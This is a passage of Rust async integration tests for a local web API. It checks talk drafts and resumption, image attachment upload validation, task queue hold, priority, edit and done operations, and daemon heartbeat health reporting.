5784 #[tokio::test]
5785 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5786 let (_tmp, _repo, f) = talk_fixture().await;
5787 let id = f.post("/api/talks", None).await.json()["id"]
5788 .as_str()
5789 .expect("id")
5790 .to_owned();
5791 let store = f.talks();
5792 let mut recovered = store.get(&id).expect("opened talk");
5793 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5794 .expect("persist pending draft without a live turn");
5795
5796 let edited = f
5797 .post(
5798 &format!("/api/talks/{id}/pending/edit"),
5799 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5800 )
5801 .await;
5802 assert_eq!(edited.status, 200, "{}", edited.body);
5803 assert!(edited.json()["thinking"].as_bool().unwrap());
5804
5805 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5806 for _ in 0..SETTLE_STEPS {
5807 if detail["turns"].as_array().expect("turns").len() == 2 {
5808 break;
5809 }
5810 tokio::time::sleep(Duration::from_millis(10)).await;
5811 detail = f.get(&format!("/api/talks/{id}")).await.json();
5812 }
5813 let turns = detail["turns"].as_array().expect("turns");
5814 assert_eq!(
5815 turns.len(),
5816 2,
5817 "the recovered draft must run once: {detail}"
5818 );
5819 assert_eq!(turns[0]["body"], "corrected");
5820 assert_eq!(detail["pending"], "");
5821 }
5822
5823 #[tokio::test]
5824 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5825 let tmp = TempDir::new().expect("tempdir");
5826 let repo = tmp.path().join("repo");
5827 std::fs::create_dir_all(&repo).expect("repo dir");
5828 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5829 let f = Fixture::with_repo(repo).await;
5830 let id = f.post("/api/talks", None).await.json()["id"]
5831 .as_str()
5832 .expect("id")
5833 .to_owned();
5834 let store = f.talks();
5835 let mut recovered = store.get(&id).expect("opened talk");
5836 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5837 .expect("persist pending draft without a live turn");
5838
5839 let refused = f
5840 .post(
5841 &format!("/api/talks/{id}/say"),
5842 Some(r#"{"text":"new message"}"#),
5843 )
5844 .await;
5845 assert_eq!(refused.status, 409, "{}", refused.body);
5846 assert!(refused.body.contains("resume"), "{}", refused.body);
5847 let saved = store.get(&id).expect("draft remains after refusal");
5848 assert!(saved.turns.is_empty());
5849 assert_eq!(saved.pending, "saved before restart");
5850
5851 let say_path = format!("/api/talks/{id}/say");
5852 let (first, second) = tokio::join!(
5853 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5854 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5855 );
5856 assert_eq!(first.status, 409, "{}", first.body);
5857 assert_eq!(second.status, 409, "{}", second.body);
5858 let saved = store
5859 .get(&id)
5860 .expect("draft remains after concurrent refusals");
5861 assert!(saved.turns.is_empty());
5862 assert_eq!(saved.pending, "saved before restart");
5863
5864 let resumed = f
5865 .post(&format!("/api/talks/{id}/pending/resume"), None)
5866 .await;
5867 assert_eq!(resumed.status, 202, "{}", resumed.body);
5868 let duplicate = f
5869 .post(&format!("/api/talks/{id}/pending/resume"), None)
5870 .await;
5871 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
5872
5873 for _ in 0..SETTLE_STEPS {
5874 if store.get(&id).expect("talk").turns.len() == 2 {
5875 break;
5876 }
5877 tokio::time::sleep(Duration::from_millis(10)).await;
5878 }
5879 let finished = store.get(&id).expect("finished talk");
5880 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5881 assert_eq!(finished.turns[0].body, "saved before restart");
5882 assert!(finished.pending.is_empty());
5883 }
5884
5885 #[tokio::test]
5886 async fn an_image_only_recovered_draft_resumes_without_text() {
5887 let (_tmp, _repo, f) = talk_fixture().await;
5888 let id = f.post("/api/talks", None).await.json()["id"]
5889 .as_str()
5890 .expect("id")
5891 .to_owned();
5892 let uploaded = f
5893 .post_bytes(
5894 &format!("/api/talks/{id}/attachments"),
5895 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
5896 PNG_BYTES,
5897 )
5898 .await;
5899 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
5900 let attachment = f
5901 .talks()
5902 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
5903 .expect("attachment metadata")
5904 .expect("stored attachment");
5905 let store = f.talks();
5906 let mut recovered = store.get(&id).expect("opened talk");
5907 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
5908
5909 let resumed = f
5910 .post(&format!("/api/talks/{id}/pending/resume"), None)
5911 .await;
5912 assert_eq!(resumed.status, 202, "{}", resumed.body);
5913 for _ in 0..SETTLE_STEPS {
5914 if store.get(&id).expect("talk").turns.len() == 2 {
5915 break;
5916 }
5917 tokio::time::sleep(Duration::from_millis(10)).await;
5918 }
5919 let finished = store.get(&id).expect("finished talk");
5920 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5921 assert!(finished.turns[0].body.is_empty());
5922 assert_eq!(finished.turns[0].attachments.len(), 1);
5923 assert!(finished.pending_attachments.is_empty());
5924 }
5925
5926 #[tokio::test]
5927 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
5928 let (_tmp, _repo, f) = talk_fixture().await;
5929 let id = f.post("/api/talks", None).await.json()["id"]
5930 .as_str()
5931 .expect("id")
5932 .to_owned();
5933 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
5934 assert_eq!(closed.status, 200, "{}", closed.body);
5935 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5936 .expect("serialize closed talk");
5937 for (path, body) in [
5938 (format!("/api/talks/{id}/pending/resume"), None),
5939 (
5940 format!("/api/talks/{id}/pending/clear"),
5941 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
5942 ),
5943 (
5944 format!("/api/talks/{id}/pending/edit"),
5945 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
5946 ),
5947 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
5948 ] {
5949 let response = f.post(&path, body).await;
5950 assert_eq!(response.status, 409, "{}", response.body);
5951 }
5952 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5953 .expect("serialize closed talk");
5954 assert_eq!(
5955 after_clear, before_clear,
5956 "clear must not rewrite a closed talk"
5957 );
5958 }
5959
5960 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
5963
5964 #[tokio::test]
5965 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
5966 let tmp = TempDir::new().expect("tempdir");
5967 let repo = tmp.path().join("repo");
5968 std::fs::create_dir_all(&repo).expect("repo dir");
5969 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5970 let f = Fixture::with_repo(repo).await;
5971 let id_a = f.post("/api/talks", None).await.json()["id"]
5972 .as_str()
5973 .unwrap()
5974 .to_owned();
5975 let id_b = f.post("/api/talks", None).await.json()["id"]
5976 .as_str()
5977 .unwrap()
5978 .to_owned();
5979
5980 let a = f
5981 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
5982 .await;
5983 assert_eq!(a.status, 202, "{}", a.body);
5984 assert_eq!(a.json()["thinking"], true);
5985 let b = f
5986 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
5987 .await;
5988 assert_eq!(b.status, 202, "{}", b.body);
5989 assert_eq!(b.json()["thinking"], true);
5990
5991 let listed = f.get("/api/talks").await.json();
5992 for id in [&id_a, &id_b] {
5993 let view = listed
5994 .as_array()
5995 .unwrap()
5996 .iter()
5997 .find(|talk| talk["id"] == *id)
5998 .unwrap();
5999 assert_eq!(view["thinking"], true, "{listed}");
6000 }
6001 let repeated = f
6002 .post(
6003 &format!("/api/talks/{id_a}/say"),
6004 Some(r#"{"text":"again"}"#),
6005 )
6006 .await;
6007 assert_eq!(repeated.status, 202, "{}", repeated.body);
6008 assert_eq!(repeated.json()["pending"], "again");
6009 }
6010
6011 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6014
6015 #[tokio::test]
6016 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6017 let f = Fixture::start().await;
6018 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6019
6020 let res = f
6021 .post_bytes(
6022 &format!("/api/talks/{id}/attachments"),
6023 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6024 PNG_BYTES,
6025 )
6026 .await;
6027 assert_eq!(res.status, 201, "{}", res.body);
6028 let body = res.json();
6029 assert_eq!(body["name"], "shot.png");
6030 assert_eq!(body["mime"], "image/png");
6031 assert_eq!(body["bytes"], PNG_BYTES.len());
6032 let att_id = body["id"].as_str().expect("id").to_owned();
6033 assert_eq!(
6034 att_id.len(),
6035 32,
6036 "the id must never be a client-suppliable path: {att_id}"
6037 );
6038
6039 let got = f
6040 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6041 .await;
6042 assert_eq!(got.status, 200, "{}", got.body);
6043 assert_eq!(got.header("content-type"), Some("image/png"));
6044 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6045 assert_eq!(got.bytes, PNG_BYTES);
6046 }
6047
6048 #[tokio::test]
6049 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6050 let f = Fixture::start().await;
6051 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6052
6053 let svg = f
6056 .post_bytes(
6057 &format!("/api/talks/{id}/attachments"),
6058 &[("Content-Type", "image/svg+xml")],
6059 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6060 )
6061 .await;
6062 assert!(
6063 (400..500).contains(&svg.status),
6064 "svg must be refused: {} {}",
6065 svg.status,
6066 svg.body
6067 );
6068 assert!(svg.body.contains("SVG"), "{}", svg.body);
6069
6070 let text = f
6071 .post_bytes(
6072 &format!("/api/talks/{id}/attachments"),
6073 &[("Content-Type", "text/plain")],
6074 b"just some text",
6075 )
6076 .await;
6077 assert!(
6078 (400..500).contains(&text.status),
6079 "an unlisted type must be refused: {} {}",
6080 text.status,
6081 text.body
6082 );
6083
6084 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6087 let big = f
6088 .post_bytes(
6089 &format!("/api/talks/{id}/attachments"),
6090 &[("Content-Type", "image/png")],
6091 &oversized,
6092 )
6093 .await;
6094 assert_eq!(
6095 big.status,
6096 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6097 "{}",
6098 big.body
6099 );
6100 }
6101
6102 #[tokio::test]
6103 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6104 let f = Fixture::start().await;
6105 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6106
6107 let res = f
6110 .post_bytes(
6111 &format!("/api/talks/{id}/attachments"),
6112 &[("Content-Type", "image/png")],
6113 b"<html>not a picture</html>",
6114 )
6115 .await;
6116 assert!((400..500).contains(&res.status), "{}", res.body);
6117 }
6118
6119 #[tokio::test]
6120 async fn an_unknown_attachment_id_is_a_404() {
6121 let f = Fixture::start().await;
6122 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6123
6124 let res = f
6125 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6126 .await;
6127 assert_eq!(res.status, 404, "{}", res.body);
6128 }
6129
6130 #[tokio::test]
6131 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6132 let f = Fixture::start().await;
6133 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6134
6135 let uploaded = f
6136 .post_bytes(
6137 &format!("/api/talks/{id}/attachments"),
6138 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6139 PNG_BYTES,
6140 )
6141 .await;
6142 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6143 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6144
6145 let res = f
6146 .post(
6147 &format!("/api/talks/{id}/say"),
6148 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6149 )
6150 .await;
6151 assert_eq!(res.status, 202, "{}", res.body);
6152 let queued = res.json();
6153 let turns = queued["turns"].as_array().expect("turns array");
6154 assert_eq!(
6155 turns.len(),
6156 1,
6157 "an empty body with an attachment is still a turn: {queued}"
6158 );
6159 assert_eq!(turns[0]["who"], "operator");
6160 assert_eq!(turns[0]["body"], "");
6161 let atts = turns[0]["attachments"]
6162 .as_array()
6163 .expect("attachments array");
6164 assert_eq!(atts.len(), 1);
6165 assert_eq!(atts[0]["id"], att_id);
6166 assert_eq!(atts[0]["mime"], "image/png");
6167
6168 let on_disk = f.talks().get(&id).expect("get");
6171 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6172 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6173 }
6174
6175 #[tokio::test]
6176 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6177 let f = Fixture::start().await;
6178 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6179
6180 let res = f
6181 .post(
6182 &format!("/api/talks/{id}/say"),
6183 Some(&format!(
6184 r#"{{"text":"hi","attachments":["{}"]}}"#,
6185 "a".repeat(32)
6186 )),
6187 )
6188 .await;
6189 assert!((400..500).contains(&res.status), "{}", res.body);
6190 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6191
6192 let on_disk = f.talks().get(&id).expect("get");
6193 assert!(
6194 on_disk.turns.is_empty(),
6195 "a rejected attachment id must not partially record the turn: {:?}",
6196 on_disk.turns
6197 );
6198 }
6199
6200 #[tokio::test]
6201 async fn talk_close_makes_the_talk_refuse_further_turns() {
6202 let f = Fixture::start().await;
6203 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6204
6205 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6206 assert_eq!(closed.status, 200, "{}", closed.body);
6207 assert_eq!(closed.json()["status"], "closed");
6208
6209 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6211 assert_eq!(closed_again.status, 200);
6212 assert_eq!(closed_again.json()["status"], "closed");
6213
6214 let said = f
6215 .post(
6216 &format!("/api/talks/{id}/say"),
6217 Some(r#"{"text":"too late"}"#),
6218 )
6219 .await;
6220 assert_eq!(said.status, 409, "{}", said.body);
6221 }
6222
6223 #[tokio::test]
6224 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6225 let (_tmp, _repo, f) = talk_fixture().await;
6226 let id = f.post("/api/talks", None).await.json()["id"]
6227 .as_str()
6228 .expect("id")
6229 .to_owned();
6230 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6231 assert_eq!(closed.status, 200, "{}", closed.body);
6232
6233 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6234 assert_eq!(reopened.status, 200, "{}", reopened.body);
6235 assert_eq!(reopened.json()["status"], "open");
6236
6237 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6239 assert_eq!(reopened_again.status, 200);
6240 assert_eq!(reopened_again.json()["status"], "open");
6241
6242 let said = f
6243 .post(
6244 &format!("/api/talks/{id}/say"),
6245 Some(r#"{"text":"still there?"}"#),
6246 )
6247 .await;
6248 assert_eq!(
6249 said.status, 202,
6250 "a reopened talk accepts turns again: {}",
6251 said.body
6252 );
6253 }
6254
6255 #[tokio::test]
6256 async fn talk_reopen_on_an_unknown_id_is_404() {
6257 let f = Fixture::start().await;
6258 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6259 assert_eq!(res.status, 404, "{}", res.body);
6260 }
6261
6262 #[tokio::test]
6263 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6264 let f = Fixture::start().await;
6265 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6266
6267 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6268 assert_eq!(deleted.status, 204, "{}", deleted.body);
6269
6270 let after = f.get(&format!("/api/talks/{id}")).await;
6271 assert_eq!(after.status, 404, "{}", after.body);
6272
6273 let listed = f.get("/api/talks").await.json();
6274 assert!(
6275 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6276 "a deleted talk must not linger in the list: {listed}"
6277 );
6278 }
6279
6280 #[tokio::test]
6281 async fn talk_delete_on_an_unknown_id_is_404() {
6282 let f = Fixture::start().await;
6283 let res = f.delete("/api/talks/nonexistent-id").await;
6284 assert_eq!(res.status, 404, "{}", res.body);
6285 }
6286
6287 #[tokio::test]
6288 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6289 let f = Fixture::start().await;
6290 let queue = f.queue();
6291 let mut task = Task::new(
6292 "spent".to_owned(),
6293 "Try again".to_owned(),
6294 PathBuf::from("/repo/magi"),
6295 Source::Human,
6296 );
6297 task.start("20260902-140502-bbbb".to_owned());
6298 task.fail("agent gave up", 9);
6299 queue.put(&mut task).expect("file the task");
6300
6301 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6302 assert_eq!(held.status, 200);
6303 assert_eq!(held.json()["status_str"], "held");
6304
6305 let released = f
6306 .post(&format!("/api/queue/{}/release", task.id), None)
6307 .await;
6308 assert_eq!(released.status, 200);
6309 assert_eq!(released.json()["status_str"], "queued");
6310 assert_eq!(
6311 released.json()["attempts"],
6312 0,
6313 "release is a real second chance, not an instant re-hold"
6314 );
6315 assert_eq!(
6316 queue.get(&task.id).expect("reload").status,
6317 TaskStatus::Queued,
6318 "the change is on disk, not only in the reply"
6319 );
6320 assert!(
6321 !f.home
6322 .path()
6323 .join("queue")
6324 .join(format!("{}.lock", task.id))
6325 .exists(),
6326 "the claim the mutation took is released again"
6327 );
6328 }
6329
6330 #[tokio::test]
6331 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6332 let f = Fixture::start().await;
6333 let queue = f.queue();
6334 let mut task = Task::new(
6335 "busy".to_owned(),
6336 "Running right now".to_owned(),
6337 PathBuf::from("/repo/magi"),
6338 Source::Human,
6339 );
6340 queue.put(&mut task).expect("file the task");
6341 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6342
6343 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6344
6345 assert_eq!(res.status, 409);
6346 assert_eq!(
6347 queue.get(&task.id).expect("reload").status,
6348 TaskStatus::Queued,
6349 "the refused hold changed nothing"
6350 );
6351 }
6352
6353 #[tokio::test]
6354 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6355 let f = Fixture::start().await;
6356 let queue = f.queue();
6357 let mut task = Task::new(
6358 "waiting on the migration".to_owned(),
6359 "Do the thing".to_owned(),
6360 PathBuf::from("/repo/magi"),
6361 Source::Human,
6362 );
6363 queue.put(&mut task).expect("file the task");
6364
6365 let held = f
6366 .post(
6367 &format!("/api/queue/{}/hold", task.id),
6368 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6369 )
6370 .await;
6371 assert_eq!(held.status, 200, "{}", held.body);
6372 assert_eq!(held.json()["status_str"], "held");
6373 assert_eq!(
6374 held.json()["hold_reason"],
6375 "waiting for 20260101-000000-aaaa to land"
6376 );
6377
6378 let listed = f.get("/api/queue").await.json();
6379 assert_eq!(
6380 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6381 "the card reads the reason off the same list route"
6382 );
6383
6384 let mut plain = Task::new(
6387 "no reason given".to_owned(),
6388 "Do another thing".to_owned(),
6389 PathBuf::from("/repo/magi"),
6390 Source::Human,
6391 );
6392 queue.put(&mut plain).expect("file the task");
6393 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6394 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6395 assert!(held_plain.json()["hold_reason"].is_null());
6396
6397 let released = f
6398 .post(&format!("/api/queue/{}/release", task.id), None)
6399 .await;
6400 assert_eq!(released.status, 200);
6401 assert!(
6402 released.json()["hold_reason"].is_null(),
6403 "a release must clear the reason so the next hold does not inherit it"
6404 );
6405 }
6406
6407 #[tokio::test]
6408 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6409 let f = Fixture::start().await;
6410 let queue = f.queue();
6411 let mut older = Task::new(
6412 "filed first".to_owned(),
6413 "x".to_owned(),
6414 PathBuf::from("/repo/magi"),
6415 Source::Human,
6416 );
6417 older.id = "20260101-000001-aaaa".to_owned();
6418 let mut newer = Task::new(
6419 "filed second".to_owned(),
6420 "x".to_owned(),
6421 PathBuf::from("/repo/magi"),
6422 Source::Human,
6423 );
6424 newer.id = "20260101-000002-bbbb".to_owned();
6425 queue.put(&mut older).expect("file older");
6426 queue.put(&mut newer).expect("file newer");
6427
6428 let before = f.get("/api/queue").await.json();
6431 assert_eq!(before[0]["id"], newer.id);
6432 assert_eq!(before[1]["id"], older.id);
6433
6434 let raised = f
6438 .post(
6439 &format!("/api/queue/{}/priority", older.id),
6440 Some(r#"{"priority":10}"#),
6441 )
6442 .await;
6443 assert_eq!(raised.status, 200, "{}", raised.body);
6444 assert_eq!(raised.json()["priority"], 10);
6445
6446 let after = f.get("/api/queue").await.json();
6447 let names: Vec<&str> = after
6448 .as_array()
6449 .unwrap()
6450 .iter()
6451 .map(|t| t["id"].as_str().unwrap())
6452 .collect();
6453 assert_eq!(names[0], older.id, "the raised task now sorts first");
6457 }
6458
6459 #[tokio::test]
6460 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6461 let f = Fixture::start().await;
6462 let queue = f.queue();
6463 let mut task = Task::new(
6464 "in flight".to_owned(),
6465 "x".to_owned(),
6466 PathBuf::from("/repo/magi"),
6467 Source::Human,
6468 );
6469 task.start("20260902-140502-bbbb".to_owned());
6470 queue.put(&mut task).expect("file the task");
6471
6472 let res = f
6473 .post(
6474 &format!("/api/queue/{}/priority", task.id),
6475 Some(r#"{"priority":9}"#),
6476 )
6477 .await;
6478 assert_eq!(res.status, 400, "{}", res.body);
6479 assert!(
6480 res.json()["error"]
6481 .as_str()
6482 .is_some_and(|e| e.contains("running")),
6483 "{}",
6484 res.body
6485 );
6486 assert_eq!(
6487 queue.get(&task.id).expect("reload").priority,
6488 0,
6489 "the refused write must not partially apply"
6490 );
6491 }
6492
6493 #[tokio::test]
6494 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6495 let f = Fixture::start().await;
6496 let queue = f.queue();
6497 let mut task = Task::new(
6498 "old title".to_owned(),
6499 "old instruction".to_owned(),
6500 PathBuf::from("/repo/magi"),
6501 Source::Agent {
6502 run: "20260101-000000-beef".to_owned(),
6503 node: "implement".to_owned(),
6504 },
6505 );
6506 task.runs.push("20260101-000000-beef".to_owned());
6507 queue.put(&mut task).expect("file the task");
6508 let created_at = task.created_at;
6509
6510 let edited = f
6511 .post(
6512 &format!("/api/queue/{}/edit", task.id),
6513 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6514 )
6515 .await;
6516 assert_eq!(edited.status, 200, "{}", edited.body);
6517 let body = edited.json();
6518 assert_eq!(body["title"], "new title");
6519 assert_eq!(body["instruction"], "new instruction");
6520 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6521 assert_eq!(body["created_at"], created_at.to_string());
6522 assert_eq!(
6523 body["source"]["kind"], "agent",
6524 "editing a task an agent filed must not turn it human: {body}"
6525 );
6526 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6527
6528 let reloaded = queue.get(&task.id).expect("reload");
6529 assert_eq!(reloaded.title, "new title");
6530 assert_eq!(reloaded.instruction, "new instruction");
6531 }
6532
6533 #[tokio::test]
6534 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6535 let f = Fixture::start().await;
6536 let queue = f.queue();
6537 let mut task = Task::new(
6538 "in flight".to_owned(),
6539 "do not touch".to_owned(),
6540 PathBuf::from("/repo/magi"),
6541 Source::Human,
6542 );
6543 task.start("20260902-140502-bbbb".to_owned());
6544 queue.put(&mut task).expect("file the task");
6545
6546 let res = f
6547 .post(
6548 &format!("/api/queue/{}/edit", task.id),
6549 Some(r#"{"title":"x","instruction":"y"}"#),
6550 )
6551 .await;
6552 assert_eq!(res.status, 400, "{}", res.body);
6553 assert!(
6554 res.json()["error"]
6555 .as_str()
6556 .is_some_and(|e| e.contains("running")),
6557 "{}",
6558 res.body
6559 );
6560 assert_eq!(
6561 queue.get(&task.id).expect("reload").instruction,
6562 "do not touch",
6563 "the refused edit must not change the file"
6564 );
6565 }
6566
6567 #[tokio::test]
6568 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6569 let f = Fixture::start().await;
6570 let queue = f.queue();
6571 let mut task = Task::new(
6572 "busy".to_owned(),
6573 "Running right now".to_owned(),
6574 PathBuf::from("/repo/magi"),
6575 Source::Human,
6576 );
6577 queue.put(&mut task).expect("file the task");
6578 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6579
6580 let priority = f
6581 .post(
6582 &format!("/api/queue/{}/priority", task.id),
6583 Some(r#"{"priority":9}"#),
6584 )
6585 .await;
6586 assert_eq!(priority.status, 409, "{}", priority.body);
6587
6588 let edit = f
6589 .post(
6590 &format!("/api/queue/{}/edit", task.id),
6591 Some(r#"{"title":"x","instruction":"y"}"#),
6592 )
6593 .await;
6594 assert_eq!(edit.status, 409, "{}", edit.body);
6595 }
6596
6597 #[tokio::test]
6598 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6599 let f = Fixture::start().await;
6600 let queue = f.queue();
6601 let mut task = Task::new(
6602 "shipped by hand".to_owned(),
6603 "merged outside the loop".to_owned(),
6604 PathBuf::from("/repo/magi"),
6605 Source::Agent {
6606 run: "20260101-000000-b455".to_owned(),
6607 node: "implement".to_owned(),
6608 },
6609 );
6610 task.runs.push("20260101-000000-b455".to_owned());
6611 task.runs.push("20260101-000000-9af4".to_owned());
6612 queue.put(&mut task).expect("file the task");
6613 let created_at = task.created_at;
6614
6615 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6616 assert_eq!(done.status, 200, "{}", done.body);
6617 assert_eq!(done.json()["status_str"], "done");
6618
6619 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6620 assert_eq!(
6621 reloaded.runs,
6622 ["20260101-000000-b455", "20260101-000000-9af4"]
6623 );
6624 assert_eq!(
6625 reloaded.source,
6626 Source::Agent {
6627 run: "20260101-000000-b455".to_owned(),
6628 node: "implement".to_owned(),
6629 }
6630 );
6631 assert_eq!(reloaded.created_at, created_at);
6632 }
6633
6634 #[tokio::test]
6635 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6636 let f = Fixture::start().await;
6641 let queue = f.queue();
6642 let mut task = Task::new(
6643 "landed while held".to_owned(),
6644 "x".to_owned(),
6645 PathBuf::from("/repo/magi"),
6646 Source::Human,
6647 );
6648 task.hold_manual(Some("waiting on 3ed9".to_owned()));
6649 queue.put(&mut task).expect("file the held task");
6650
6651 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6652 assert_eq!(done.status, 200, "{}", done.body);
6653 assert_eq!(done.json()["status_str"], "done");
6654 assert!(
6655 done.json()["hold_reason"].is_null(),
6656 "a done task cannot still be waiting on something: {}",
6657 done.body
6658 );
6659 }
6660
6661 #[tokio::test]
6662 async fn unknown_ids_are_json_not_found_on_both_stores() {
6663 let f = Fixture::start().await;
6664
6665 let run = f.get("/api/runs/nosuchrun").await;
6666 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6667
6668 assert_eq!(run.status, 404);
6669 assert_eq!(task.status, 404);
6670 assert!(
6671 run.json()["error"]
6672 .as_str()
6673 .is_some_and(|e| e.contains("run")),
6674 "the error names what was not found: {}",
6675 run.body
6676 );
6677 assert!(
6678 task.json()["error"]
6679 .as_str()
6680 .is_some_and(|e| e.contains("task")),
6681 "the error names what was not found: {}",
6682 task.body
6683 );
6684 }
6685
6686 #[tokio::test]
6687 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6688 let f = Fixture::start().await;
6689
6690 let missing = f.get("/api/health").await.json();
6691 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6692
6693 write_daemon(
6694 f.home.path(),
6695 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6696 );
6697 let stale = f.get("/api/health").await.json();
6698 assert_eq!(
6699 stale["daemon"]["running"], false,
6700 "a minute without a heartbeat is a dead daemon, not a busy one"
6701 );
6702 assert!(
6703 stale["daemon"]["stale_for_secs"]
6704 .as_i64()
6705 .is_some_and(|s| s >= 55),
6706 "staleness is reported so the UI can say how long: {stale}"
6707 );
6708
6709 write_daemon(f.home.path(), Timestamp::now());
6710 let fresh = f.get("/api/health").await.json();
6711 assert_eq!(fresh["daemon"]["running"], true);
6712 assert_eq!(fresh["daemon"]["idle"], false);
6713 assert_eq!(fresh["daemon"]["pid"], 4242);
6714 assert_eq!(fresh["daemon"]["completed"], 7);
6715 assert_eq!(
6716 fresh["daemon"]["current"][0]["task"],
6717 "20260902-140501-aaaa"
6718 );
6719 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6720 }
6721
6722 #[tokio::test]
6723 async fn the_loop_is_not_running_until_something_starts_it() {
6724 let f = Fixture::start().await;
6725
6726 let view = f.get("/api/loop").await.json();
6727 assert_eq!(view["running"], false);
6728 assert_eq!(
6729 view["owned"], false,
6730 "nobody owns a loop that does not exist: {view}"
6731 );
6732 assert_eq!(view["stopping"], false);
6733 assert_eq!(view["last_error"], Value::Null);
6734 assert_eq!(view["daemon"]["running"], false);
6735 assert_eq!(
6736 view["repo"], "/repo/magi",
